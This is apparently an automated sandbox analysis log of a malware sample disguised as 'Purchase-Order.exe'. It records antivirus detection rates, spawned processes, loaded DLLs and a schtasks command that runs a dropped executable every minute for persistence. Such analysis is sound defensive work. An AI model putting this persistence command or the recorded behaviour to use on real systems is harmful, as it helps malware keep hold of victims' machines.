                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Users\user\Desktop\Purchase-Order.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: Purchase-Order.exeVirustotal: Detection: 86%
                                Source: Purchase-Order.exeReversingLabs: Detection: 92%
                                Source: C:\Users\user\Desktop\Purchase-Order.exeFile read: C:\Users\user\Desktop\Purchase-Order.exeJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\Purchase-Order.exe "C:\Users\user\Desktop\Purchase-Order.exe"
                                Source: C:\Users\user\Desktop\Purchase-Order.exeProcess created: C:\Users\user\Desktop\._cache_Purchase-Order.exe "C:\Users\user\Desktop\._cache_Purchase-Order.exe"
                                Source: C:\Users\user\Desktop\Purchase-Order.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn LMDNDG.exe /tr C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe /sc minute /mo 1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\LMDNDG.vbs
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn LMDNDG.exe /tr C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe /sc minute /mo 1
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe "C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe
                                Source: unknownProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe "C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe "C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
                                Source: C:\Users\user\Desktop\Purchase-Order.exeProcess created: C:\Users\user\Desktop\._cache_Purchase-Order.exe "C:\Users\user\Desktop\._cache_Purchase-Order.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn LMDNDG.exe /tr C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe /sc minute /mo 1Jump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\LMDNDG.vbsJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn LMDNDG.exe /tr C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe /sc minute /mo 1
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: twext.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: cscapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: shacct.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: twinapi.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: idstore.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: samlib.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: starttiledata.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: acppage.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: aepic.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: wlidprov.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: provsvc.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: twext.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: starttiledata.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: acppage.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: aepic.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: mswsock.dllJump to behavior
